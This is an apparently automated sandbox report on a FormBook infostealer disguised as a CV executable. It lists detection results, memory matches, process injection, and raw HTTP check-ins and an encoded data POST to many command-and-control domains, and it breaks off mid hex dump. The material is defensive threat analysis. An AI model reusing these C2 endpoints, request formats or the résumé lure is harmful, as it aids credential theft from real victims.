Windows Analysis Report
Curriculum Vitae Catalina Munoz.exe

AV Detection

Source: Curriculum Vitae Catalina Munoz.exe

Avira: detected

Source: http://www.duobao698.com/ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y	Avira URL Cloud: Label: malware
Source: http://www.gett.hu/1df8/	Avira URL Cloud: Label: malware
Source: http://www.drdavidglassman.com/61qh/	Avira URL Cloud: Label: malware
Source: http://www.lets-goo.ru/jcz4/	Avira URL Cloud: Label: malware
Source: http://www.duobao698.com/ff4v/	Avira URL Cloud: Label: malware
Source: http://www.drdavidglassman.com/61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y	Avira URL Cloud: Label: malware
Source: http://www.lets-goo.ru/jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y	Avira URL Cloud: Label: malware

Source: duobao698.com	Virustotal: Detection: 5%			Perma Link
Source: gett.hu	Virustotal: Detection: 5%			Perma Link
Source: http://www.drdavidglassman.com/61qh/	Virustotal: Detection: 7%			Perma Link
Source: http://www.duobao698.com/ff4v/	Virustotal: Detection: 5%			Perma Link

Source: Curriculum Vitae Catalina Munoz.exe	ReversingLabs: Detection: 63%
Source: Curriculum Vitae Catalina Munoz.exe	Virustotal: Detection: 56%			Perma Link

Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Curriculum Vitae Catalina Munoz.exe

Joe Sandbox ML: detected

Compliance

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Curriculum Vitae Catalina Munoz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1377872255.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662366685.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: TSTheme.pdb source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Curriculum Vitae Catalina Munoz.exe, Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: TSTheme.pdbGCTL source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Windows\SysWOW64\TSTheme.exe

Code function: 15_2_02FDBE90 FindFirstFileW,FindNextFileW,FindClose,

15_2_02FDBE90

Software Vulnerabilities

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 4x nop then jmp 07891CE1h		0_2_07891317
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 4x nop then xor eax, eax		15_2_02FC96D0
Source: C:\Windows\SysWOW64\TSTheme.exe	Code function: 4x nop then pop edi		15_2_02FD23FD

Networking

Source: Traffic

Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49710 -> 124.156.151.111:80

Source: Joe Sandbox View	IP Address: 203.161.43.228 203.161.43.228
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y HTTP/1.1Host: www.crxwdix.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /1df8/?4h=HKzVUqf1aEuVi+2sXpcO0QRiAr3gocmC4R78U/lSG5GPWeqrEM/dj7KCi/m7j8wlbFRbxXaftyt8S80LR8LDtnhaMK2/eM8I7y9bqMxgYhPG1v0QEsNv7Olz+oqDA3TDqZmGkZkE9/dY&623=YLI8v8eXd0Y HTTP/1.1Host: www.gett.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y HTTP/1.1Host: www.lets-goo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Y HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y HTTP/1.1Host: www.duobao698.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y HTTP/1.1Host: www.drdavidglassman.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y HTTP/1.1Host: www.friendsfavorites.petAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /arkx/?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y HTTP/1.1Host: www.featuringnature.deAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y HTTP/1.1Host: www.kohfour.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y HTTP/1.1Host: www.getmall.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /yfa0/?4h=0WhDsKDlEsw2U2hGDN8VHtGa3OHmwnAep36jQbkxMA/yUt9OY1uk5sHeApFDjZn3CMzAWurlvftixp+c+vBUGrqZNxyLTULtMs5Dxygy6ogz213YpKfivi2Kz6VhB8QL1f0m+iF6WOns&623=YLI8v8eXd0Y HTTP/1.1Host: www.uqdr.cnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y HTTP/1.1Host: www.kernelphysics.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /zxqv/?4h=OundE2exmel4zoR2h8DaiP5rA6rWpfsTmCodHa3wAeftE7HOQeIovEJMwiGRwn5EG1Ay+Vr7sNzWsvI7Z9ouBjSqQ9kX1TTXpDayR3bilNm8LgIuib/ea4tO/6BxMsTG0spQdKgoBIvM&623=YLI8v8eXd0Y HTTP/1.1Host: www.theppelin.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Y HTTP/1.1Host: www.botcsllc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Source: global traffic	HTTP traffic detected: GET /wy0r/?4h=WzjQ5Lku/CcVmfYMLh2se4NW5p5EcwqyA3YiOMIwT77nsakaLKShRywTCni07+Ypglha0We7/XFNEOgzZwpW0Iau+HgTJhKyqKoR5usZjmbjCMnZJqH26R2XpANM+dd2J9nsS8vZ76/r&623=YLI8v8eXd0Y HTTP/1.1Host: www.shengniu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2

Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp

String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)

Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp

String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.crxwdix.store
Source: global traffic	DNS traffic detected: DNS query: www.gett.hu
Source: global traffic	DNS traffic detected: DNS query: www.lets-goo.ru
Source: global traffic	DNS traffic detected: DNS query: www.emgeecontracting.shop
Source: global traffic	DNS traffic detected: DNS query: www.duobao698.com
Source: global traffic	DNS traffic detected: DNS query: www.drdavidglassman.com
Source: global traffic	DNS traffic detected: DNS query: www.friendsfavorites.pet
Source: global traffic	DNS traffic detected: DNS query: www.featuringnature.de
Source: global traffic	DNS traffic detected: DNS query: www.kohfour.com
Source: global traffic	DNS traffic detected: DNS query: www.getmall.online
Source: global traffic	DNS traffic detected: DNS query: www.uqdr.cn
Source: global traffic	DNS traffic detected: DNS query: www.kernelphysics.com
Source: global traffic	DNS traffic detected: DNS query: www.theppelin.online
Source: global traffic	DNS traffic detected: DNS query: www.botcsllc.com
Source: global traffic	DNS traffic detected: DNS query: www.shengniu.com

Source: unknown

HTTP traffic detected: POST /1df8/ HTTP/1.1Host: www.gett.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.gett.huConnection: closeContent-Length: 215Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.gett.hu/1df8/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2Data Raw: 34 68 3d 4b 49 62 31 58 63 7a 32 62 30 61 71 74 59 47 77 53 62 49 55 75 43 67 58 48 72 7a 44 73 38 69 45 37 42 76 6b 5a 4d 70 41 50 65 62 63 57 4b 61 4d 58 62 37 35 6c 4c 57 67 2b 39 4f 44 73 74 63 32 42 32 4a 6a 78 46 4b 6c 77 53 6f 49 4a 76 51 6c 52 35 33 36 77 45 64 52 4d 49 71 59 63 65 49 30 32 56 35 73 30 75 46 66 47 77 2b 51 79 59 6f 55 43 2f 74 6f 79 76 42 32 38 64 50 36 58 31 65 6e 74 73 7a 56 73 37 4d 4e 6f 63 64 65 74 6a 4f 57 7a 59 63 5a 7a 63 4b 4f 31 4a 55 67 69 46 36 62 6b 53 4b 42 59 75 57 4d 30 49 2f 54 53 52 38 59 42 6c 67 5a 73 4c 7a 72 5a 56 72 5a 6d 68 65 57 79 77 74 45 36 78 43 34 31 73 6c 33 38 6c 34 37 2b 77 3d 3d Data Ascii: 4h=KIb1Xcz2b0aqtYGwSbIUuCgXHrzDs8iE7BvkZMpAPebcWKaMXb75lLWg+9ODstc2B2JjxFKlwSoIJvQlR536wEdRMIqYceI02V5s0uFfGw+QyYoUC/toyvB28dP6X1entszVs7MNocdetjOWzYcZzcKO1JUgiF6bkSKBYuWM0I/TSR8YBlgZsLzrZVrZmheWywtE6xC41sl38l47+w==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:34:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 